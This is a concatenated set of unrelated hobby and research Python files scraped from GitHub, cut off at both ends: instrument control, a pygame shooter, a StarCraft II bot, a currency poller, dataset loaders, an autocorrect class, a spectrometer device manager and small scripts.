isou.read()\r\n else:\r\n isou.write('P2\\r')\r\n isou.read()\r\n \r\ndef startRamp(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n isou.write('A1\\r')\r\n isou.read()\r\n \r\ndef hold(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n\r\nIset = 1.0\r\nbooli = True\r\nrm = pyvisa.ResourceManager()\r\nprint(rm.list_resources())\r\nsrs, dsp, therm, isou = open(rm)\r\nisou.clear()\r\nsetMax(isou, Iset)\r\nsetSign(isou, booli)\r\nstartRamp(isou)\r\nfor i in range(0, 100):\r\n ret = getData(srs, dsp, therm, isou)\r\n print(ret)\r\n if(np.abs(ret[0]) == Iset):\r\n booli = not booli\r\n setSign(isou, booli)\r\n startRamp(isou)\r\n time.sleep(1)\r\nhold(isou)","repo_name":"SamuelMumford/GUIData","sub_path":"GPIBTest.py","file_name":"GPIBTest.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26053614297","text":"import os\nimport pygame\nimport globals\nfrom os import listdir\nfrom os.path import isfile, join\n\nclass Crosshair(pygame.sprite.Sprite):\n\n\t# Constructor\n\tdef __init__(self, xOffset = 16, yOffset = 16):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.image.load(os.path.join(globals.data_dir, 'img/crosshair.png'))\n\t\tself.mask = pygame.mask.from_surface(self.image)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = (16, 16)\n\t\tself.xOffset = xOffset\n\t\tself.yOffset = yOffset\n\n\tdef update(self):\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0] - self.xOffset\n\t\tself.rect.y = mousePos[1] - self.yOffset\n \t\t\nclass Gun(pygame.sprite.Sprite):\n\tbulletsLeft = 0\n\n\t# Constructor\n\tdef __init__(self):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.bulletsLeft = globals.gunMaxBullets\n\t\tself.image = pygame.image.load(os.path.join(globals.data_dir, 'img/gun.png'))\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = (229, 181)\n\t\tself.rect.y = globals.winHeight-160\n\n\tdef update(self):\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0]+64\n \t\t\nclass Gunshot(pygame.sprite.Sprite):\n\tframes = []\n\tframeRepeat = 3\n\tsteps = 0\n\n\t# Constructor\n\tdef __init__(self):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\n\t\t# Get all frames\n\t\tpath = \"data/img/gunshot/\"\n\t\tframes = [f for f in listdir(path) if isfile(join(path, f))]\n\n\t\t# Put all frames in a list of Pygame images\n\t\tself.images = []\n\t\tfor frame in frames:\n\t\t\tself.images.append(pygame.image.load(path + frame))\n\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\n\t\t# Position\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0]+20\n\t\tself.rect.y = globals.winHeight-212\n\n\tdef update(self):\n\t\tif self.index >= len(self.images):\n\t\t\tself.kill()\n\t\telse:\n\t\t\tself.image = self.images[self.index]\n\t\t\tself.image.set_colorkey((0, 0, 0))\n\t\t\tmousePos = pygame.mouse.get_pos()\n\t\t\tself.rect.x = mousePos[0]+20\n\n\t\t\t# This will make sure that we repeat frames\n\t\t\t# so animation looks a bit slower\n\t\t\tif self.steps % self.frameRepeat == 0:\n\t\t\t\tself.index += 1\n\t\t\tself.steps += 1","repo_name":"TaffoVelikoff/ViolentCityGame","sub_path":"resources/classes/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25983526353","text":"\n\nimport sc2\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.unit import Unit\n\nfrom sc2.constants import UnitTypeId\n\nfrom sc2.ids.ability_id import AbilityId\n\nimport pickle\n\nfrom MicroAgentC1 import MicroAgentC1\n\nfrom buildOrder import *\n\nclass TestBot1(MicroAgentC1):\n\n def __init__(self):\n\n #This is a simple zerg build setup to start with\n bo1 = [BO_Supply(TriggerSupply(13)),\n BO_Build(TriggerSupply(16),UnitTypeId.SPAWNINGPOOL),\n BO_Gas(TriggerReady(UnitTypeId.SPAWNINGPOOL,50)),\n BO_Supply(TriggerSupply(19)),\n BO_GasHarvesting(TriggerResourceCount(0,96),False),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_Build(TriggerSupply(21), UnitTypeId.ZERGLING, count=2),\n BO_AutoSupply(TriggerSupply(22),True),\n BO_UnitPriorities(TriggerSupply(22), [UnitTypeId.ZERGLING])\n ]\n\n #Simple BO to research speed early game (to test things like gas and research\n bo2= [ BO_Build(TriggerSupply(13), UnitTypeId.SPAWNINGPOOL),\n BO_Gas(TriggerImmediate()),\n BO_Supply(TriggerImmediate()),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n #TODO: maybe 2 or 4 lings for protection here? and scouting?\n BO_AutoSupply(TriggerImmediate(), True),\n BO_GasHarvesting(TriggerResourceCount(0, 96), False),\n BO_Upgrade(TriggerImmediate(), UpgradeId.ZERGLINGMOVEMENTSPEED),\n BO_Build(TriggerImmediate(), UnitTypeId.QUEEN),\n BO_UnitPriorities(TriggerSupply(20),[UnitTypeId.ZERGLING]),\n BO_Expand(TriggerResourceCount(250)),\n BO_AttackAllIn(TriggerSupply(30)), # not the best trigger but it's a start\n BO_Build(TriggerResourceCount(250), UnitTypeId.QUEEN),\n BO_Build(TriggerResourceCount(300), UnitTypeId.QUEEN),\n ]\n\n\n #Simple hatch first BO to see if drone balance and queen stuff can work\n bo3 = [#TODO: extractor trick?\n BO_Expand(TriggerSupply(14)),\n BO_Gas(TriggerImmediate()),\n BO_Build(TriggerSupply(14), UnitTypeId.SPAWNINGPOOL),\n BO_Supply(TriggerImmediate()),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_AutoSupply(TriggerImmediate(), True),\n BO_GasHarvesting(TriggerResourceCount(0,96),False), # remove drones once we have 100 gas!\n BO_UnitPriorities(TriggerImmediate(), [UnitTypeId.ZERGLING]),\n BO_Build(TriggerSupply(19), UnitTypeId.QUEEN),\n BO_Upgrade(TriggerResourceCount(100,100), UpgradeId.ZERGLINGMOVEMENTSPEED)\n ]\n\n #Simply test to build queens and see what they can do\n bo4 = [\n BO_Build(TriggerImmediate(), UnitTypeId.SPAWNINGPOOL),\n BO_AutoSupply(TriggerImmediate(), True),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n ]\n\n super(TestBot1,self).__init__(bo2)\n\n\n\n async def on_step(self, iteration: int):\n\n if iteration == 1:\n #pickle.dump(self.game_info.placement_grid, open(\"placement.p\",\"wb\"))\n #pickle.dump(self.state.creep, open(\"creep.p\", \"wb\"))\n #pickle.dump(self.state.visibility, open(\"vis.p\", \"wb\"))\n #pickle.dump(self.game_info.terrain_height, open(\"height.p\", \"wb\"))\n #pickle.dump(self.game_info.pathing_grid, open(\"path.p\", \"wb\"))\n print(f\"start location: {self.start_location}\")\n\n #Call base agent step first\n #This takes care of some low level stuff first at highest priority\n await super(TestBot1,self).on_step(iteration)\n\n ### Basic Observations & State updates ###\n\n\n ### Macro ###\n self.player_id\n\n\n\nrun_game(maps.get(\"Simple64\"), [\n Bot(Race.Zerg, TestBot1()),\n Computer(Race.Protoss, Difficulty.VeryHard)\n #Bot(Race.Zerg, TestBot1()),\n], realtime=True , game_time_limit=480.0)\n\n\n\n#run_game(maps.get(\"Abyssal Reef LE\"), [\n# Bot(Race.Zerg, TestBot1()),\n# Computer(Race.Protoss, Difficulty.Medium)\n#], realtime=True , game_time_limit=120.0)\n\n","repo_name":"MarcaunonXtreme/sc2_agentx","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16546062155","text":"import requests\nimport time\nimport json\nwhile True:\n #Import quotes via API\n quotation = requests.get('https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL')\n quotation = quotation.json()\n \n #Filter the desired values in Dollars\n quotation_dolar = quotation['USDBRL']['bid']\n value_pay_dolar = '5.12'\n #Filters the desired values in Euro\n quotation_euro = quotation['EURBRL']['bid']\n value_pay_euro ='6.196'\n #Filter the desired values in Bitcoin\n quotation_bitcoin = quotation['BTCBRL']['bid']\n value_pay_bitcoin = '190000' \\\n ''\n #Print desired values\n print('Dólar $:', quotation_dolar,'R$ |', 'Euro €:',quotation_euro,'R$ |','BitCoin ₿:',quotation_bitcoin,'R$')\n\n #Compare the values with the objective\n if (quotation_dolar < value_pay_dolar):\n print ('O dólar chegou no valor desejado')\n if (quotation_euro < value_pay_euro):\n print('O Euro chegou no valor desejado')\n if (quotation_bitcoin < value_pay_euro):\n print('A bitcoin chegou no valor desejado')\n\n time.sleep(2)\n\n\n\n","repo_name":"llucasrafaell/stock-exchange","sub_path":"StockExchange.py","file_name":"StockExchange.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40805203080","text":"# -*- coding: utf-8 -*-\nimport pickle as p\nimport numpy as np\nimport os\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ndef load_MNIST(file_dir):\n return input_data.read_data_sets(file_dir,one_hot = True)\n\n\ndef load_CIFAR_batch(filename):\n \"\"\" 载入cifar数据集的一个batch \"\"\"\n with open(filename, 'rb') as f:\n datadict = p.load(f, encoding='latin1')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1)#.astype(\"float\")\n Y = np.array(Y)\n return X, Y\n\ndef load_CIFAR10(file_dir):\n \"\"\" 载入cifar全部数据 \"\"\"\n xs = []\n ys = []\n Xtr = []\n Ytr = []\n for b in range(1,6):\n data_file = os.path.join(file_dir, 'data_batch_%d' % (b,))\n X, Y = load_CIFAR_batch(data_file)\n\n xs.append(X) #将所有batch整合起来\n ys.append(Y)\n Xtr = np.concatenate(xs) #使变成行向量,最终Xtr的尺寸为(50000,32,32,3)\n Ytr = np.concatenate(ys)\n Xte, Yte = load_CIFAR_batch(os.path.join(file_dir, 'test_batch'))\n return Xtr, Ytr, Xte, Yte\n\n\n\n# cifar10_dir = 'data_set/cifar-10-batches-py/'\n# X_train, Y_train, X_test, Y_test = load_CIFAR10(cifar10_dir)\n#\n# def unpickle(file):\n# with open(file, 'rb') as fo:\n# dict = p.load(fo, encoding='bytes')\n# return dict\n# classes = unpickle(cifar10_dir+\"batches.meta\")\n# print(classes)","repo_name":"jainszhang/LearnDM","sub_path":"DL/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42287113424","text":"import os\nimport re\nfrom copy import deepcopy\n\nimport numpy as np\nfrom numpy import unique\n\n\nclass AutoCorrect:\n def __init__(self):\n pass\n\n def process_data(self, file_name):\n words = []\n file = open(f\"{os.getcwd()}/{file_name}\", \"r\")\n content = file.read()\n content_lower = content.lower()\n lines = content_lower.split('\\n')\n for line in lines:\n words_line = line.split(' ')\n for word_line in words_line:\n letters_only = re.sub(\"[^A-Za-z0-9]+\", \"\", word_line)\n if len(letters_only) > 0:\n words.append(letters_only)\n words = words[:10] + words[2775:]\n return words\n\n def get_count(self, word_l):\n word_count_dict = {}\n for word in word_l:\n word_count_dict[word] = 1 if word not in word_count_dict.keys() else word_count_dict[word] + 1\n return word_count_dict\n\n def get_probs(self, word_count_dict):\n probs = {}\n for word in word_count_dict.keys():\n probs[word] = word_count_dict[word] / np.sum(list(word_count_dict.values()))\n return probs\n\n def delete_letter(self, word, verbose=False):\n delete_l = []\n for index in range(len(word)):\n delete_l.append(word[:index] + word[index + 1:])\n return delete_l\n\n def switch_letter(self, word, verbose=False):\n switch_l = []\n for index in range(len(word) - 1):\n switch_l.append(word[:index] + word[index + 1] + word[index] + word[index + 2:])\n return switch_l\n\n def replace_letter(self, word, verbose=False):\n letters = 'abcdefghijklmnopqrstuvwxyz'\n replace_l = []\n for index in range(len(word)):\n for letter in letters:\n word_replaced = word[:index] + letter + word[index + 1:]\n if word_replaced not in replace_l + [word]:\n replace_l.append(word_replaced)\n return sorted(replace_l)\n\n def insert_letter(self, word, verbose=False):\n letters = 'abcdefghijklmnopqrstuvwxyz'\n insert_l = []\n for index in range(len(word) + 1):\n for letter in letters:\n insert_l.append(word[:index] + letter + word[index:])\n return insert_l\n\n def edit_one_letter(self, word, allow_switches=True):\n return set(unique(self.insert_letter(word) + self.delete_letter(word) + self.replace_letter(word) + self.switch_letter(word)))\n\n def edit_two_letters(self, word, allow_switches=True):\n edit_two_set = []\n edit_one_set = self.edit_one_letter(word)\n for word in edit_one_set:\n edit_two_set += self.edit_one_letter(word)\n return set(edit_two_set)\n\n def edit_n_letters(self, edit_set, word, n=1):\n if n == 1:\n return self.edit_one_letter(word)\n edit_set_next = []\n for edit_word in edit_set:\n edit_set_next.append(self.edit_one_letter(edit_word))\n return self.edit_n_letters(edit_set_next, word, n - 1)\n\n def get_corrections(self, word, probs, vocab, n=2, verbose=False):\n if word in vocab:\n return [word]\n edit_probs_total = {}\n for edit_distance in range(1, n):\n edit_probs = {edit_word: probs[edit_word] for edit_word in self.edit_n_letters([], word, n=edit_distance).intersection(vocab)}\n edit_probs_total.update(edit_probs)\n max_probs = sorted(list(edit_probs_total.values()))[len(edit_probs_total.values()) - n:]\n edit_words = []\n for index in range(len(edit_probs_total.keys())):\n edit_word, edit_word_prob = list(edit_probs_total.keys())[index], list(edit_probs_total.values())[index]\n if edit_word_prob in max_probs:\n edit_words.append((edit_word, edit_word_prob))\n return sorted(edit_words, key=lambda edit_tuple: edit_tuple[1], reverse=True)\n\n def min_edit_distance(self, source, target, ins_cost=1, del_cost=1, rep_cost=2):\n rows, columns = len(source), len(target)\n distances = np.zeros((rows + 1, columns + 1), dtype=int)\n for row in range(0, rows + 1):\n distances[row, 0] = row * ins_cost\n for column in range(0, columns + 1):\n distances[0, column] = column * del_cost\n for row in range(1, rows + 1):\n for column in range(1, columns + 1):\n r_cost = 0 if source[row - 1] == target[column - 1] else rep_cost\n distances[row, column] = min(distances[row - 1, column - 1] + r_cost, distances[row - 1, column] + ins_cost, distances[row, column - 1] + del_cost)\n return distances, distances[rows, columns]\n\nif __name__ == '__main__':\n auto_correct = AutoCorrect()\n vocab = auto_correct.process_data('/data/shakespeare.txt')\n word_count_dict = auto_correct.get_count(vocab)\n probs = auto_correct.get_probs(word_count_dict)\n auto_correct.delete_letter(word=\"cans\", verbose=True)\n auto_correct.switch_letter(word=\"eta\", verbose=True)\n auto_correct.replace_letter(word='can', verbose=True)\n auto_correct.insert_letter('at', True)\n auto_correct.edit_one_letter('can', True)\n auto_correct.edit_two_letters(\"at\")\n auto_correct.edit_two_letters(\"at\")\n auto_correct.get_corrections(\"dys\", probs, vocab, 2, verbose=True)\n auto_correct.min_edit_distance('star', 'stack', ins_cost=2, del_cost=2, rep_cost=3)","repo_name":"nitsansoffair/auto_correct","sub_path":"src/AutoCorrect.py","file_name":"AutoCorrect.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19969089849","text":"import sys\nimport time\nimport logging\nimport threading\n\nfrom wasatch.WasatchDevice import WasatchDevice\nfrom wasatch.WasatchBus import WasatchBus\n\nlogger = logging.getLogger(__name__)\n\nclass Device_Manager:\n def __init__(self, msg_queues):\n self.msg_queues = msg_queues\n self.device = None\n connected = False\n self.msg_response_funcs = {\n 'EEPROM': self.get_eeprom,\n 'HAS_BATTERY': self.has_battery,\n 'BATTERY': self.battery,\n 'GET_GAIN': self.get_gain,\n 'SET_GAIN': self.set_gain,\n 'SET_INT_TIME': self.set_int_time,\n 'GET_INT_TIME': self.get_int_time,\n 'GET_SPECTRA': self.get_spectra,\n 'GET_ROI': self.get_roi,\n 'SET_ROI': self.set_roi,\n 'SET_LASER': self.set_laser,\n 'SET_WATCHDOG': self.set_laser_watchdog,\n 'SET_RAMAN_DELAY': self.set_raman_delay,\n 'GET_LASER_STATE': self.get_laser_state,\n 'GET_WATCHDOG_DELAY': self.get_watch_delay,\n 'GET_RAMAN_DELAY': self.get_raman_delay,\n 'GET_RAMAN_MODE': self.get_raman_mode,\n }\n self.connection_thread = threading.Thread(target=self.connect_new_spec)\n self.connection_thread.start()\n worker_thread = threading.Thread(target=self.device_worker)\n worker_thread.start()\n self.conn_watch = threading.Thread(target=self.connection_watchdog)\n self.conn_watch.start()\n\n def connection_watchdog(self):\n if self.check_device_connected() and self.connection_thread == None:\n logger.info(\"Device Manager: Identified lost connection with spectrometer. Attempting to reconnect.\")\n self.connection_thread = threading.Thread(target=self.connect_new_spec)\n self.connection_thread.start()\n time.sleep(1)\n\n def connect_new_spec(self):\n logger.info(\"Device Manager: Trying to connect new spectrometer.\")\n connected = False\n self.connection_attempt_count = 0\n logging.getLogger().setLevel(logging.INFO)\n while not connected:\n try:\n self.connection_attempt_count += 1\n bus = WasatchBus()\n uid = bus.device_ids[0]\n self.device = WasatchDevice(uid)\n ok = self.device.connect()\n if not ok:\n raise\n self.device.change_setting(\"integration_time_ms\", 10)\n self.update_settings()\n self.connection_attempt_count = 0\n logging.getLogger().setLevel(logging.DEBUG)\n logger.info(\"Device Manager: Succeeded in device connection.\")\n self.connection_thread = None\n connected = True\n except:\n if self.connection_attempt_count < 3:\n logger.error(\"Device Manager: Unable to connect. Retrying.\")\n if self.connection_attempt_count == 4:\n logger.error(\"Device Manger: Unable to connect after 3 tries. Continuing but suppressing log statements.\")\n time.sleep(1)\n\n # According to Wasatch Device process_commands is usually continuously updated from continuous poll\n # This does not happen in many of these asynchronous commands \n # So this function ensures they arent stuck in the queue\n def update_settings(self):\n self.device.process_commands()\n\n def is_valid_command(self, command):\n command = command.replace('\\n','')\n command = command.upper()\n return self.msg_response_funcs.get(command,False)\n\n def device_worker(self):\n while True:\n for comm_method in self.msg_queues.keys():\n if not self.msg_queues[comm_method]['send'].empty():\n priority, data = self.msg_queues[comm_method]['send'].get_nowait()\n msg_id = data[\"Id\"]\n msg = data[\"Message\"]\n logger.debug(f\"Device Manager: Received request from {comm_method} of {msg}\")\n self.process_msg(msg_id, msg, comm_method)\n\n def check_device_connected(self):\n # The rather messy following line is meant to check if we are still connected\n # Not all errors immediately indicate a connection issue nor do connection issues bubble up from Wasatch.PY\n return self.device == None or self.device.hardware == None or (self.device.hardware.shutdown_requested or (not self.device.hardware.connected and not self.device.hardware.connecting))\n\n def process_msg(self, msg_id, msg, comm_method):\n msg_cmd = msg['Command'].upper()\n process_func = None\n process_func = self.msg_response_funcs.get(msg_cmd,None)\n if process_func is not None:\n msg_response = process_func(msg['Value'])\n if msg_response[\"Error\"] is not None:\n logger.error(f\"Device Manager: Encountered error of {msg_response['Error']} while handling msg {msg} from msg id {msg_id}\")\n if self.check_device_connected():\n msg_response[\"Error\"] = \"Device is not connected. Check connection then send a few commands to verify reconnection.\"\n logger.info(\"Device Manager: Providing msg respone\")\n self.msg_queues[comm_method]['recv'].put((msg_id, msg_response))\n else:\n logger.error(f\"Device Manager: Received invalid request of {msg} from msg id {msg_id}\")\n self.msg_queues[comm_method]['recv'].put((msg_id,'INVALID_OPTION'))\n \n def get_eeprom(self, not_used):\n try:\n self.device.settings.eeprom.generate_write_buffers()\n eeprom = self.device.settings.eeprom.write_buffers\n return {\"Res_Value\": eeprom, \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get eeprom {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get eeprom\"}\n\n def has_battery(self, not_used):\n try:\n return {\"Res_Value\": self.device.settings.eeprom.has_battery, \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to check for battery {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to check for battery\"}\n\n def battery(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_battery_percentage(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get battery % {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get battery %\"}\n\n def get_gain(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_detector_gain(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get gain. {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get gain.\"}\n\n def set_gain(self, gain_value):\n try:\n gain_value = float(gain_value)\n self.device.hardware.set_detector_gain(gain_value)\n self.update_settings()\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_gain for gain_value of {type(gain_value)}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid type for gain of {type(gain_value)}\"}\n\n def set_int_time(self, int_value):\n try:\n int_value = float(int_value)\n self.device.change_setting(\"integration_time_ms\",int_value)\n self.update_settings()\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_int_time for int_value of {type(int_value)}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid type for integration time of {type(int_value)}\"}\n except ValueError:\n logger.error(f\"Device Manager: Invalid value while in set_int_time for int_value of {int_value}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid value for integration time of {int_value}\"}\n\n def get_int_time(self, not_used):\n try:\n res = {\"Res_Value\": self.device.hardware.get_integration_time_ms(), \"Error\": None}\n logger.info(f\"Device Manager: Received integration time of {res['Res_Value']}\")\n return res\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get int time {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get int time\"}\n\n def get_spectra(self, not_used):\n try:\n self.device.acquire_data()\n return {\"Res_Value\": self.device.acquire_data().spectrum, \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get spectra {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get spectra\"}\n\n def get_roi(self, not_used):\n try:\n start_roi = self.device.settings.eeprom.roi_horizontal_start\n end_roi = self.device.settings.eeprom.roi_horizontal_end\n return {\"Res_Value\": (start_roi, end_roi), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get roi {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get roi\"}\n\n def set_roi(self, roi_values):\n try:\n start_roi, end_roi = roi_values.split(',')\n self.device.hardware.set_vertical_binning([int(start_roi), int(end_roi)])\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_roi for roi values of {type(roi_values)}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi type, start type of {type(roi_values)}\"}\n except ValueError:\n logger.error(f\"Device Manager: Invalid value for roi values {roi_values}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi values of {roi_values}\"}\n except AttributeError:\n logger.error(f\"Device Manager: Attribute error in set_roi for value of {roi_values}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi values of {roi_values}\"}\n\n def set_laser(self, enabled):\n try:\n if enabled == '1':\n self.device.hardware.set_laser_enable(True)\n return {\"Res_Value\": True, \"Error\": None}\n else:\n self.device.hardware.set_laser_enable(False)\n return {\"Res_Value\": False, \"Error\": None}\n except Exception as e:\n try:\n self.device.hardware.set_laser_enable(False)\n except:\n pass\n logger.error(f\"Device Manager: Ran into error while trying to set laser {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to set laser\"}\n\n def set_laser_watchdog(self,timeout):\n try:\n self.device.hardware.set_laser_watchdog_sec(int(timeout))\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_laser_watchdog for timeout of {type(timeout)}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid type for watchdog timeout of {type(timeout)}\"}\n\n def set_raman_delay(self,delay_time):\n try:\n self.device.hardware.set_raman_delay_ms(int(delay_time))\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_raman_delay for delay_time of {type(delay_time)}\")\n return {\"Res_Value\": False, \"Error\": f'Invalid tpye for raman delay time of {type(delay_time)}'}\n\n def get_laser_state(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_laser_enable(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get laser state {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get laser state\"}\n\n def get_watch_delay(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_laser_watchdog_sec(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get laser watchdog delay {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get laser watchdog delay\"}\n\n def get_raman_delay(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_raman_delay_ms(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get raman delay {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get raman delay\"}\n\n def get_raman_mode(self, not_used):\n try:\n return {\"Res_Value\": self.device.hardware.get_raman_mode_enable_NOT_USED(), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get raman mode {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get raman mode\"}\n","repo_name":"WasatchPhotonics/RPi-Communication","sub_path":"deviceManager.py","file_name":"deviceManager.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13983977081","text":"from threading import Thread\nimport time\nimport os\nclass Printer(Thread):\n def run(self):\n for i in range(100):\n print(i)\n time.sleep(1)\n \nclass FileHandler:\n def __init__(self,name):\n self.name = name\n self.file = open(self.name,\"w\")\n self.file.close()\n def read(self):\n try:\n self.file = open(\"test12345.txt\",\"r\")\n except:\n open(\"test12345.txt\",\"w\")\n self.read()\n print(self.file.read())\n self.file.close()\n input(\"\")\n\n def write(self,text):\n self.file = open(\"test1234.txt\",\"a\")\n self.file.write(text+\"\\n\")\n self.file.close()\n\n\nprinter = Printer()\nprinter.start()\n\nhandler = FileHandler()\nexitFlag = False\n\nwhile(not exitFlag):\n os.system(\"clear\")\n print('''\n ---- MENU ----\n 1. READ\n 2. WRITE\n 3. EXIT\n '''\n )\n try:\n choice = int(input(\"Enter Choice: \"))\n except ValueError:\n choice = -1\n if choice == 1:\n handler.read()\n elif choice == 2:\n handler.write(input(\"Enter Text to Write: \"))\n elif choice == 3:\n exitFlag = True\n else:\n print(\"Incorrect Choice, do again\")\n input(\"\")\n\n \n","repo_name":"aijazahmadwani/python_IMCA-4-sem","sub_path":"Python_Programs/asgn1.py","file_name":"asgn1.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20853575296","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == \"__main__\":\n ln = len(argv) - 1\n if ln == 0:\n print(\"0 arguments.\")\n elif ln > 0:\n if ln == 1:\n print(\"{} argument:\".format(ln))\n elif ln > 1:\n print(\"{} arguments:\".format(ln))\n for i in range(ln):\n print(\"{}: {}\".format(i + 1, argv[i + 1]))\n","repo_name":"ibnAbuMahdi/alx-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75341252328","text":"'''\n\n 给定一个数组 nums 和一个值 val,你需要原地移除所有数值等于 val 的元素,返回移除后数组的新长度。\n\n 不要使用额外的数组空间,你必须在原地修改输入数组并在使用 O(1) 额外空间的条件下完成。\n\n 元素的顺序可以改变。你不需要考虑数组中超出新长度后面的元素。\n\n'''\n\nclass Solution:\n def removeElement(self, num, val):\n result = 0\n if len(num) == 0:\n return result\n font_point = 0\n bcak_point = len(num) - 1\n count = 0\n while font_point < bcak_point:\n if num[font_point] == val:\n temp = num[bcak_point]\n num[bcak_point] = num[font_point]\n num[font_point] = temp\n bcak_point -= 1\n else:\n count += 1\n font_point += 1\n if num[font_point] != val:\n count += 1\n result = len(num[0:count])\n return result\n\n\nif __name__ == '__main__':\n num = [0, 1, 2, 2, 3, 0, 4, 2]\n val = 2\n ss = Solution()\n print(ss.removeElement(num, val))\n","repo_name":"yudongnan23/algorithmRoad","sub_path":"python/pyleetcode/array_string/pointer_removeElement.py","file_name":"pointer_removeElement.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36493084701","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nmethod_order_list = 